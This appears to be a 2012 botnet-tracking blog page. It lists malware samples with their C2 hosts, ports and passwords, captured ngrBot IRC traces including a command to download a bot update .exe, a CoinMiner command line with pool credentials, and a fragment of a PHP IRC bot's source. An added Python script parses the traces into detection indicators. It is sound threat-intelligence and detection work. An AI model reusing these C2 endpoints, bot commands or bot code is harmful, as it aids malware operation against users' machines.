Month: May 2012

xxxd2.com (ngrBot hosted in United States, Clarks Summit, Volumedrive)

Resolved: [xxxd2.com] To [199.168.140.38]

Remote Host / Port Number:
173.192.224.115 80
199.15.234.7 80
199.168.140.38 7777

PASS Eshuxx
NICK n{US|XPa}evkfwgc
USER evkfwgc 0 0 :evkfwgc
JOIN #eshu Eshuxx
PRIVMSG #eshu :[d="http://www.fotosprivadas.com/chicas/update/Ruco.exe" s="172032 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0

Sample hosting infos: http://whois.domaintools.com/199.168.140.38

new.pusikuracbre.me (CoinMiner hosted in Russian Federation, Selectel Ltd.)

From the same lamer as here: http://www.exposedbotnets.com/search?q=8332

Sample Sample Sample

Resolved: [new.pusikuracbre.me] To [31.186.102.181]
Resolved: [new.pusikuracbre.me] To [31.186.102.180]
Resolved: [new.pusikuracbre.me] To [31.186.102.155]

Running process (the miner is pointed at the pool on port 8332 with the worker credentials embedded in the command line):
miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss

Xandora results here

Hosting infos: http://whois.domaintools.com/31.186.102.180

75.77.40.195 (ngrBot hosted in United States, Greenville, Windstream Nuvox Inc)

Remote Host / Port Number:
199.15.234.7 80
75.77.40.195 6668

PASS ngrBot
PRIVMSG #asiksi# :[DNS]: Blocked "windowsupdate.microsoft.com"
NICK n{US|XPa}vxpwwmw
USER vxpwwmw 0 0 :vxpwwmw
JOIN #asiksi# asdr3ny
PRIVMSG #asiksi# :[DNS]: Blocked "www.microsoft.com"
PRIVMSG #asiksi# :[DNS]: Blocked "microsoft.com"
PRIVMSG #asiksi# :[DNS]: Blocked "update.microsoft.com"
Now talking in #asiksi#
Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.com

v1.0 Ultimate phpB (Linux bots hosted in Brazil, Comite Gestor Da Internet No Brasil)

Albanian hacker using PHP bots to flood IRC channels. The bot source, as found (the configuration block is cut off after the server and port):

    #####################################################################
    #v1.0 Ultimate phpB. Enjoy ! ! ! ! !                                #
    #                                                                   #
    #                                  Fixed By TiRoNcI_BoY®            #
    #                                  Albhack@msn.com                  #
    #####################################################################
    <?
    set_time_limit(0);
    error_reporting(0);

    class pBot {
        ####################### V1.0 CONFIGURATION ########################
        var $config = array("server"=>"189.30.30.10",   #
                            "port"=>6667,               // server port #

cube.sdeirc.net (ngrBot hosted in Netherlands, Amsterdam, Ecatel Ltd)

Our anonymous friend pointed at this URL, http://cbteam.ws/ (inside you have samples). I checked the files and found this botnet, whose IPs I already posted in the blog.

Resolved: [cube.sdeirc.net] To [89.248.166.139]

Remote Host / Port Number:
cube.sdeirc.net 7392

PASS none
NICK New{US-XP-x86}1124207
USER 1124207 "" "1124207" :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
JOIN #rndbot zrag
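The three IRC traces on this page (xxxd2.com, 75.77.40.195 and cube.sdeirc.net) share one shape: a connection to a non-standard port, a PASS, a nick that encodes country and OS in braces, a JOIN with a channel key, and PRIVMSG lines that either carry a download command or report blocked DNS lookups. The script below is an added example, not code from the original blog, that parses such captured lines into indicators and flags those bot-like features. The CONNECT marker line is a constructed convention for "the sandbox saw a connection to host:port"; the sample log is constructed from the traces above; and the nick regex generalises the two nick shapes seen here (n{US|XPa}... and New{US-XP-x86}...) to other country codes and OS tokens, which is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Nick shapes seen in the traces: n{US|XPa}evkfwgc and New{US-XP-x86}1124207.
# Prefix, then {COUNTRY sep OS-token}, then a random or numeric suffix.
# Assumption: other two-letter country codes and OS tokens follow the same shape.
BOT_NICK_RE = re.compile(r"^[A-Za-z]+\{[A-Z]{2}[|-][A-Za-z0-9-]+\}[A-Za-z0-9]+$")
# Download command embedded in a channel message: [d="URL" s="SIZE"]
PAYLOAD_RE = re.compile(r'\[d="(?P<url>[^"]+)"\s+s="(?P<size>[^"]+)"\]')
# Bot reporting that it blocked a DNS lookup on the infected host
DNS_BLOCK_RE = re.compile(r'\[DNS\]: Blocked "(?P<domain>[^"]+)"')
STANDARD_IRC_PORTS = {6667, 6697}

# Constructed sample: IRC commands as captured in the traces above, one per
# line. "CONNECT host port" is a constructed marker for the reported remote host.
SAMPLE_LOG = """\
CONNECT 199.168.140.38 7777
PASS Eshuxx
NICK n{US|XPa}evkfwgc
USER evkfwgc 0 0 :evkfwgc
JOIN #eshu Eshuxx
PRIVMSG #eshu :[d="http://www.fotosprivadas.com/chicas/update/Ruco.exe" s="172032 bytes"] Updated bot file
CONNECT 75.77.40.195 6668
PASS ngrBot
PRIVMSG #asiksi# :[DNS]: Blocked "windowsupdate.microsoft.com"
NICK n{US|XPa}vxpwwmw
JOIN #asiksi# asdr3ny
CONNECT cube.sdeirc.net 7392
PASS none
NICK New{US-XP-x86}1124207
USER 1124207 "" "1124207" :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
JOIN #rndbot zrag
"""


@dataclass
class BotSession:
    server: Optional[str] = None
    port: Optional[int] = None
    password: Optional[str] = None
    nick: Optional[str] = None
    channels: List[Tuple[str, Optional[str]]] = field(default_factory=list)  # (channel, key)
    payload_urls: List[str] = field(default_factory=list)
    blocked_domains: List[str] = field(default_factory=list)


def parse_irc_log(text: str) -> List[BotSession]:
    """Split a captured client-to-server IRC log into one session per CONNECT."""
    sessions: List[BotSession] = []
    cur: Optional[BotSession] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        verb, _, rest = line.partition(" ")
        if verb == "CONNECT":
            host, _, port = rest.partition(" ")
            cur = BotSession(server=host, port=int(port))
            sessions.append(cur)
            continue
        if cur is None:  # log without a CONNECT marker: collect into one session
            cur = BotSession()
            sessions.append(cur)
        if verb == "PASS":
            cur.password = rest
        elif verb == "NICK":
            cur.nick = rest
        elif verb == "JOIN":
            # Single-channel JOIN form as seen in the traces: "JOIN #chan [key]"
            chan, _, key = rest.partition(" ")
            cur.channels.append((chan, key or None))
        elif verb == "PRIVMSG":
            cur.payload_urls.extend(m.group("url") for m in PAYLOAD_RE.finditer(rest))
            cur.blocked_domains.extend(m.group("domain") for m in DNS_BLOCK_RE.finditer(rest))
    return sessions


def suspicion_reasons(s: BotSession) -> List[str]:
    """Human-readable reasons a session looks like IRC bot C2 rather than a chat client."""
    reasons: List[str] = []
    if s.nick and BOT_NICK_RE.match(s.nick):
        reasons.append("nick encodes country/OS in braces (ngrBot-style)")
    if s.port is not None and s.port not in STANDARD_IRC_PORTS:
        reasons.append(f"non-standard IRC port {s.port}")
    if any(key for _, key in s.channels):
        reasons.append("joins keyed channel")
    if s.payload_urls:
        reasons.append("channel message carries a download command")
    if s.blocked_domains:
        reasons.append("bot reports blocking DNS lookups for update sites")
    return reasons


if __name__ == "__main__":
    for sess in parse_irc_log(SAMPLE_LOG):
        print(f"{sess.server}:{sess.port} nick={sess.nick} channels={sess.channels}")
        for r in suspicion_reasons(sess):
            print("  -", r)
```

The C2 host, port, channel and key from each session are the indicators to block or alert on; the payload URL is the next sample to fetch, and the blocked-domain list explains why an infected host stops receiving Windows updates.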

LilyJade Software (malware downloader hosted in United States, Redmond, Microsoft Corp)

Got the sample from our anonymous friend and here is what it does:

1. Downloads the file installer.gif (note the NSIS installer user agent and the install telemetry in the query string):

GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: stats.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache

2. Downloads and installs fake Chrome. The data identified by the following URLs was then requested from the remote web server:

http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes
http://crt.usertrust.com/AddTrustExternalCARoot.p7c
http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2
http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml
http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0
http://crl.verisign.com/pca3.crl
http://crl.verisign.com/ThawteTimestampingCA.crl